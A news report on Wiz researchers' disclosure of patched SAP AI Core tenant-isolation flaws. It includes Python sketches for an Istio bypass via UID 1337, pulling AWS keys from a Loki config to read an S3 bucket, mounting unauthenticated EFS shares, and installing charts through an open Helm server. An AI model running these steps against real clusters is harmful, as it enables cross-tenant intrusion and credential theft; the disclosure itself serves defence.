SAP has fixed vulnerabilities in its SAP AI Core service that could have allowed an attacker to access sensitive data of other tenants in the shared SAP cloud infrastructure.
The flaws, which were patched in May and disclosed publicly by Wiz researchers on Wednesday, are the third example the researchers found of AI services failing to properly isolate tenants. The team previously discovered similar flaws in the Hugging Face and Replicate AI services.
“We believe these services are more susceptible to tenant isolation vulnerabilities, since by definition, they allow users to run AI models and applications — which is equivalent to executing arbitrary code,” the researchers wrote.
Istio bypass grants access to internal SAP network
Operating as a regular SAP AI Core customer, the Wiz researchers found that their movement through the internal network was restricted by Istio, an open-source service mesh that manages traffic and acted as a sort of firewall between tenants and the rest of the internal network.
The team used their normal SAP AI Core customer permissions to spawn a Kubernetes Pod and execute code through AI training procedures, attempting to bypass the Pod’s Istio proxy sidecar. Early attempts, such as running their container as “root,” were unsuccessful.
However, they ultimately achieved the bypass through two configurations that were not blocked — “shareProcessNamespace” and “runAsUser.”
The former enabled them to share a process namespace with the Istio proxy and access its configuration, which included an access token to the cluster’s centralized Istiod server. The latter enabled them to run AI training procedures (i.e. execute code) under Istio’s user ID (UID), which turned out to be “1337.”
Since Istio itself was excluded from the firewall-like traffic restrictions, running as UID 1337 enabled the researchers to move laterally through the internal network and access other tenants’ services.
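Both settings correspond to standard fields in a Kubernetes Pod specification. The sketch below, written with the official Kubernetes Python client, illustrates what a Pod combining them could look like; the namespace, names and container image are hypothetical placeholders, not details from the Wiz write-up, and in SAP AI Core the equivalent settings were supplied through the training workload configuration rather than a raw kubeconfig.

```python
# Minimal sketch of a Pod spec combining the two settings described above.
# Namespace, names and image are hypothetical; only shareProcessNamespace and
# runAsUser (1337, the UID reserved for the Istio sidecar) reflect the technique
# described in the article.
from kubernetes import client, config

config.load_kube_config()  # assumes an ordinary tenant kubeconfig

pod = client.V1Pod(
    metadata=client.V1ObjectMeta(name="training-job", namespace="tenant-ns"),
    spec=client.V1PodSpec(
        share_process_namespace=True,  # maps to shareProcessNamespace: true
        containers=[
            client.V1Container(
                name="trainer",
                image="example.registry/training-image:latest",
                security_context=client.V1SecurityContext(
                    run_as_user=1337,  # maps to runAsUser: 1337, so traffic is
                                       # treated as the proxy's own and skips
                                       # Istio's iptables redirection
                ),
            )
        ],
    ),
)

client.CoreV1Api().create_namespaced_pod(namespace="tenant-ns", body=pod)
```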
SAP AI vulnerabilities leaked access tokens, AI data and more
With access to SAP’s internal network, the researchers found a treasure trove of sensitive data that an attacker could have potentially compromised using a similar exploit.
In one case, they were able to send requests to an API endpoint of a Grafana Loki instance on the cluster, which returned a full configuration including AWS tokens for accessing the instance’s S3 bucket. The bucket contained several logs from SAP AI Core services of other customers.
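A rough illustration of that step, assuming the Loki instance exposes its standard /config endpoint and that the returned YAML carries plain S3 credentials in an AWS storage block; the hostname, configuration keys and bucket name below are made up for the example.

```python
# Hedged sketch: query a Grafana Loki /config endpoint and reuse any S3
# credentials found in the returned configuration. Hostname, key paths and
# bucket name are hypothetical.
import boto3
import requests
import yaml

LOKI_URL = "http://loki.example.internal:3100/config"  # hypothetical internal address

cfg = yaml.safe_load(requests.get(LOKI_URL, timeout=10).text)

# Where the credentials sit depends on how Loki's storage is configured;
# this assumes an aws block under storage_config.
s3_cfg = cfg["storage_config"]["aws"]
s3 = boto3.client(
    "s3",
    aws_access_key_id=s3_cfg["access_key_id"],
    aws_secret_access_key=s3_cfg["secret_access_key"],
)

# List objects in the log bucket named in the configuration (name hypothetical).
for obj in s3.list_objects_v2(Bucket="example-loki-logs").get("Contents", []):
    print(obj["Key"])
```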
The researchers also discovered six instances of Amazon Web Services (AWS) Elastic File System (EFS), whose default configuration grants file view and edit permissions, without authentication, to anyone with network access to an instance’s Network File System (NFS) ports.
Due to their access to the SAP internal network and the default configurations of the six AWS EFS instances, the researchers were able to access sensitive AI data, including code and training datasets, stored on the instances.
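Reaching such a file system requires nothing more than a standard NFS mount from inside the network. A minimal sketch, assuming a reachable mount target and NFSv4.1 (the protocol EFS speaks); the file-system DNS name is a placeholder.

```python
# Hedged sketch: mount an EFS file system over plain NFSv4.1 and list its
# contents. The DNS name is a placeholder; no AWS credentials are involved,
# only network reachability of the NFS port (2049).
import pathlib
import subprocess

EFS_TARGET = "fs-0123456789abcdef0.efs.eu-central-1.amazonaws.com"  # hypothetical
MOUNT_POINT = pathlib.Path("/mnt/efs")
MOUNT_POINT.mkdir(parents=True, exist_ok=True)

subprocess.run(
    [
        "mount", "-t", "nfs4",
        "-o", "nfsvers=4.1,tcp",
        f"{EFS_TARGET}:/",
        str(MOUNT_POINT),
    ],
    check=True,
)

# With the default EFS file-system policy there is no per-client authentication,
# so anything stored on the share is now readable (and writable).
for path in MOUNT_POINT.iterdir():
    print(path)
```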
However, the “most interesting finding,” according to the researchers, was an unauthenticated Helm server with read and write access that could be exploited to achieve a complete takeover of the Kubernetes cluster. Compromising the Helm server not only granted access to a wide array of sensitive data, but also the ability to potentially poison images and builds with malicious code, leading to a supply chain attack.
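The article does not name the exposed Helm component. Assuming it behaved like a Helm v2 Tiller endpoint, which listens on gRPC port 44134 and, without TLS configured, accepts any client, interacting with it would be as simple as pointing a Helm 2 client at that address; the host and chart below are hypothetical.

```python
# Hedged sketch: drive an unauthenticated Helm v2 (Tiller-style) endpoint with
# a Helm 2 client via subprocess. Host and chart name are hypothetical, and the
# assumption that the exposed server is Tiller is not confirmed by the article.
import subprocess

TILLER_HOST = "tiller.example.internal:44134"  # hypothetical internal address

# Read access: list every release deployed through this server.
subprocess.run(["helm", "--host", TILLER_HOST, "list", "--all"], check=True)

# Write access: installing or upgrading a chart through the same endpoint is
# what would allow tampering with workloads, images and builds in the cluster.
subprocess.run(
    ["helm", "--host", TILLER_HOST, "install", "./example-chart"],
    check=True,
)
```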
“This research demonstrates the unique challenges that the AI R&D process introduces. AI training requires running arbitrary code by definition; therefore, appropriate guardrails should be in place to assure that untrusted code is properly separated from internal assets and other tenants,” the researchers concluded.
According to a disclosure timeline provided by Wiz, the findings were first reported to SAP in January, with an initial fix applied in February. Final patches for all of the vulnerabilities were completed in May, after the researchers demonstrated bypasses of the February fix and reported them to SAP.